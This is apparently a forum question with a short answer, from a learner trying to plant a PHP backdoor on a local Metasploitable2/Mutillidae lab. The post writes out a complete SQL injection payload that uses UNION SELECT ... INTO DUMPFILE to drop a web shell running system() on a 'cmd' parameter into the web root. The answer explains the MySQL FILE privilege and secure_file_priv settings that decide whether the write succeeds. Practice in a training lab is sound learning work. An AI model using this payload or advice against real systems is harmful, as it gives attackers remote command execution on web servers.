I'm currently on planting php file on my local server(metasploitable2 mutillidate) using php backdoor program. I found out how many columns the it has and made a simple code.
' UNION SELECT null, null, null, null, '<?php if(isset($_REQUEST["cmd"])){
echo "<pre>"; $cmd = ($_REQUEST["cmd"]); system($cmd); echo "</pre>"; die;
}?>' INTO DUMPFILE '/var/www/mutillidae/backdoor.php' --
I encoded this code into url form and submitted but I failed.
It gave me the different error from I've got by far but still it doesn't work.
Error says : 'Error executing query : Can't create/write to file '/var/www/mutillidae/backdoor.php'
I guess it's pretty much about privilege but I'm not sure
The MySQL user executing the query has to have the FILE privilege in order to use SELECT ... INTO OUTFILE or SELECT ... INTO DUMPFILE. Also, if the secure_file_priv system variable is set to the pathname of a directory, you can only write to files in that directory.